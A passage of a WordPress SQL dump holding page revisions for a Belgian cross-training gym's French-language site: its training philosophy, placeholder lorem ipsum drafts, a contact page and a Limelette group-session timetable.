(6, 1, '2013-05-23 18:10:53', '2013-05-23 18:10:53', '', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-05-23 18:10:53', '2013-05-23 18:10:53', '', 5, 'http://www.crosstrainingcenter.be/?p=6', 0, 'revision', '', 0),
(358, 1, '2013-11-04 17:18:57', '2013-11-04 17:18:57', '<blockquote>\r\n<h2>Bien plus qu\'une simple activité physique, le cross training center vous propose une approche unique faisant intervenir l\'alimentation et la gestion du stress, tout en vous proposant un entraînement de qualité.</h2>\r\n&nbsp;</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-11-04 17:18:57', '2013-11-04 17:18:57', '', 5, 'http://www.crosstrainingcenter.be/5-revision-v1/', 0, 'revision', '', 0),
(36, 1, '2013-06-13 16:24:45', '2013-06-13 16:24:45', 'Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement. Ces 3 buts sont :\r\n<p align=\"center\"><b>PREVENIR</b> – <b>AMELIORER</b> – <b>RECUPERER</b>.</p>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-13 16:24:45', '2013-06-13 16:24:45', '', 5, 'http://www.crosstrainingcenter.be/?p=36', 0, 'revision', '', 0),
(37, 1, '2013-05-24 14:36:30', '2013-05-24 14:36:30', '<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-05-24 14:36:30', '2013-05-24 14:36:30', '', 11, 'http://www.crosstrainingcenter.be/?p=37', 0, 'revision', '', 0),
(8, 1, '2013-05-23 18:11:16', '2013-05-23 18:11:16', '<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>\r\n\r\n<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>\r\n\r\n<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-05-23 18:11:16', '2013-05-23 18:11:16', '', 5, 'http://www.crosstrainingcenter.be/?p=8', 0, 'revision', '', 0),
(9, 1, '2013-05-23 18:13:57', '2013-05-23 18:13:57', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Namur</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Bowling et Squash de Namur\r\nChaussée de Perwez, 251\r\n5002 Namur</address><address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></address></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1></h1>\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1></h1>\r\n<h1>Prise de RDV :</h1>\r\nLes réservations de Team Training se font en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\nLes séances de Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n0485 / 92 . 02 . 12\r\n<h1></h1>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\"></h1>', 'Contact', '', 'publish', 'closed', 'open', '', 'contact', '', '', '2015-04-21 09:07:44', '2015-04-21 09:07:44', '', 0, 'http://www.crosstrainingcenter.be/?page_id=9', 0, 'page', '', 0),
(10, 1, '2013-05-23 18:13:13', '2013-05-23 18:13:13', '', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-05-23 18:13:13', '2013-05-23 18:13:13', '', 9, 'http://www.crosstrainingcenter.be/?p=10', 0, 'revision', '', 0),
(11, 1, '2013-05-23 18:14:55', '2013-05-23 18:14:55', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>&nbsp;</h1>\r\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\r\n<img class=\"size-full wp-image-446 aligncenter\" alt=\"map\" src=\"http://www.crosstrainingcenter.be/map.png\" usemap=\"#imagemap\" width=\"300\" height=\"236\" />\r\n\r\n<map id=\"Map\" name=\"imagemap\"> <area coords=\"90,84,166,108\" shape=\"namur\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\"\" /> <area coords=\"174,121,233,132\" shape=\"limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\" /> </map>', 'Les séances', '', 'publish', 'closed', 'open', '', 'les-seances', '', '', '2013-11-04 17:38:55', '2013-11-04 17:38:55', '', 0, 'http://www.crosstrainingcenter.be/?page_id=11', 0, 'page', '', 0),
(366, 1, '2013-11-04 17:23:16', '2013-11-04 17:23:16', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\r\n<img class=\"size-full wp-image-446 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\" usemap=\"#imagemap\" width=\"300\" height=\"236\" />\r\n\r\n<map id=\"Map\" name=\"imagemap\"> <area coords=\"90,84,166,108\" shape=\"namur\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\"\" /> <area coords=\"174,121,233,132\" shape=\"limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\" /> </map>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-11-04 17:23:16', '2013-11-04 17:23:16', '', 11, 'http://www.crosstrainingcenter.be/11-revision-v1/', 0, 'revision', '', 0),
(360, 1, '2013-11-04 17:19:48', '2013-11-04 17:19:48', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>&nbsp;</h1>\r\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\r\n<img class=\"size-full wp-image-446 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\" width=\"300\" height=\"236\" usemap=\"#imagemap\" />\r\n\r\n                        <map name=\"imagemap\" id=\"Map\"> \r\n                        <area shape=\"namur\" coords=\"90,84,166,108\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\" /> \r\n                        <area shape=\"limelette\" coords=\"174,121,233,132\" href=\"http://www2.crosstrainingcenter.be/les-seances/\" /> \r\n                        </map> \r\n', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-11-04 17:19:48', '2013-11-04 17:19:48', '', 11, 'http://www.crosstrainingcenter.be/11-revision-v1/', 0, 'revision', '', 0),
(361, 1, '2013-11-04 17:20:34', '2013-11-04 17:20:34', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 3 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"trip\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline; background: #A9F5F2;\"><strong>Cardio</strong></span>: Circuit permettant de développer votre endurance musculaire et cardiovasculaire! Idéal pour brûler un maximum de calories et perdre du poids (conseillé avec un programme alimentaire)!\r\n\r\n<span style=\"text-decoration: underline; background: #A9F5A9;\"><strong>Circuit training</strong></span>: Travaillez de manière fun sur un circuit ultra-complet, accessible à tous et adapté à votre niveau! Relevez des challenges et augmentez votre confiance en vous!\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>Renforcement musculaire</strong></span>: Excellent circuit pour raffermir, muscler votre corps en profondeur avec ou sans prise de volume! Vous utiliserez entre autre le TRX suspension training (méthode 